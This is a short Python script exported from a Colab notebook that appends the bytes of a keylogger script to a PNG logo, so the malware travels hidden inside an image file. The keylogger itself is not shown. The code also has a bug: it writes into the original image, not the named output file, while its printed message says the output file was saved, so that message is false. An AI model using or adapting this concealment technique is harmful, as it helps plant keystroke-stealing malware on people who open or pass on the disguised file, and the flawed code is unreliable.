# -*- coding: utf-8 -*-
"""unknown2473_Embed.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/159sGfOqV_EipwfFTA6maALXqeDnpt5lE
"""

import os

def embed_keylogger_in_image(keylogger_file, image_file, output_file):
    with open(keylogger_file, "rb") as f:
        keylogger_code = f.read()

    with open(image_file, "ab") as img:
        img.write(keylogger_code)

    print(f"Keylogger embedded into {image_file}, saved as {output_file}")

# Specify the paths to the files
keylogger_file = "unknown2473Keylogger.py"         # Path to the uploaded keylogger script
image_file = "UPMlogo.png"                # Path to the uploaded PNG image
output_file = "UPMlogo_wKeylogger.png" # Output file location

embed_keylogger_in_image(keylogger_file, image_file, output_file)